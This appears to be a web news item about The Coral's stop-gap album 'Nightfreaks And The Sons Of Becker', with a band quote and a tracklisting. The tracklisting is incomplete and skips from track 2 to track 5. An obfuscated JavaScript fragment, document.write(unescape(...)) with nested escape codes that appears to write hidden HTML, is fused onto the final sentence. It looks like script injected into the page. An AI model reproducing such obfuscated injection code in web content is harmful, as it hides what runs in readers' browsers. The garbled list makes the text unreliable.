In true scouse form The Coral are trying to milk it for all they are worth and are ready to put their next album out.
The new LP, Nightfreaks And The Sons Of Becker, was completed in just one week in North Wales and recorded completely live. Apparently, the record is not a proper third album but just an intermediate stop-gap (presumably to please the bank manager).
Nightfreaks… is set for a January 26 and they will limit the release of just 75,000 copies at a reduced price of £7.99, with no singles.
"I suppose it is a third album in a way. Its an album, and its the third one." Singer James Skelly told NME, "We just had a load of songs, recorded it, did the cover and then it's done. Some of the songs we just wrote on the day. We banned anyone from hearing it til it was done."
The full tracklisting for Nightfreaks And The Sons Of Becker is as follows:
1. Precious Eyes
2. Venom Cable

5. Sorrow Or The Song

We were there the other night in Brixton Academy and if that was anything to go by it should be well worth the money.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
